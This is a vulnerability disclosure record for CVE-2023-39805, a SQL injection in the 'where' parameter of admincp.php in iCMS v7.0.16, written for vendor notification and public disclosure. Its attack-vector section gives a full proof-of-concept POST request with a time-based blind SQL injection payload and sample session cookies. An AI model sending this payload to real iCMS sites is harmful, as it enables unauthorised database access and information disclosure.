Headline
CVE-2023-39805: CVE-2023-39805
iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the where parameter at admincp.php.
[CVE-ID]
CVE-2023-39805
------------------------------------------
[Description]
iCMS v7.0.16 was discovered to contain a SQL injection vulnerability
via the where parameter at admincp.php.
------------------------------------------
[Vulnerability Type]
SQL Injection
------------------------------------------
[Vendor of Product]
icmsdev
------------------------------------------
[Affected Product Code Base]
icms V7.0.16 - V7.0.16
------------------------------------------
[Affected Component]
icms<=V7.0.16
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq_XXz5vaYOwEoS_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1
Cookie: iCMS_ADMIN_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC_CewgaX5uR1iNHfEz_Pj20qTaPC_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG_SESSION=11807
field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(10)))testsql)
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Discoverer]
chubby
------------------------------------------
[Reference]
http://icms.com
http://icmsdev.com